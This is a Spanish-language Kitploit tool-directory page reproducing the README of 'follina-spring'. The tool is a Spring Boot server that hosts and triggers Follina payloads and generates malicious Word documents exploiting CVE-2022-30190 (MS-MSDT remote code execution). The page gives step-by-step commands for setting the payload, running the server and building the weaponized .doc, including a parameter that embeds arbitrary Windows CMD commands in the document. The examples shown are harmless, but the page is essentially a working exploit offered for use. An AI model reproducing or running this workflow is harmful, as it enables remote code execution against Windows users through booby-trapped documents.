Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
follina-spring — Servidor para alojar/activar payloads de Follina y generador de documentos maliciosos de Word que explotan el protocolo MS-MSDT. (CVE-2022-30190) | Kitploit
Herramientas/GitHubGitHub/dsibilio/follina-spring
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubdsibilio/follina-spring

follina-spring

Servidor para alojar/activar payloads de Follina y generador de documentos maliciosos de Word que explotan el protocolo MS-MSDT. (CVE-2022-30190)

Ver Repositorio
4hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Explotación de Follina MS-MSDT con Spring Boot

Este repositorio contiene una aplicación Spring Boot simple que actúa tanto como servidor para alojar/activar payloads de Follina, como generador de documentos de Word maliciosos listos para ser usados como vectores de ataque para explotar CVE-2022-30190.

Esta vulnerabilidad consiste en Ejecución Remota de Código a través de MSDT (Herramienta de Diagnóstico de Soporte de Microsoft Windows).

Payload del Lado del Servidor

Para servir un payload único de tu elección, debes:

  • definir el payload, p.ej.:
root@kitploit:~
export FOLLINA_PAYLOAD="notepad.exe"
  • ejecutar el servidor para alojar el payload estático:
root@kitploit:~
mvn spring-boot:run
  • generar el documento de Word "Follina":
root@kitploit:~
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc

Si deseas cambiar el payload actual, primero debes detener el servidor activo, y repetir los pasos después de definir el nuevo payload.

NOTA: el payload puede ser reemplazado por cualquier otro comando, siempre que pueda ejecutarse a través del CMD de Windows.

Payload del Lado del Cliente

Para servir un payload del lado del cliente de tu elección, debes:

  • ejecutar el servidor para activar los payloads en tiempo de ejecución:
root@kitploit:~
mvn spring-boot:run
  • generar el documento de Word "Follina" especificando el parámetro de consulta cmd, p.ej.:
root@kitploit:~
curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc

El payload en este caso está incrustado en el documento, y simplemente necesitará activación contactando al servidor. De esta manera, puedes tener múltiples payloads diferentes distribuidos en varios documentos y no tendrás que reiniciar el servidor para cambiar de payload, ya que puedes simplemente generar un nuevo documento con el payload deseado incrustado.

Agradecimientos

Muchas gracias a John Hammond por crear la implementación en Python y compartir su análisis del CVE.

Descargar herramienta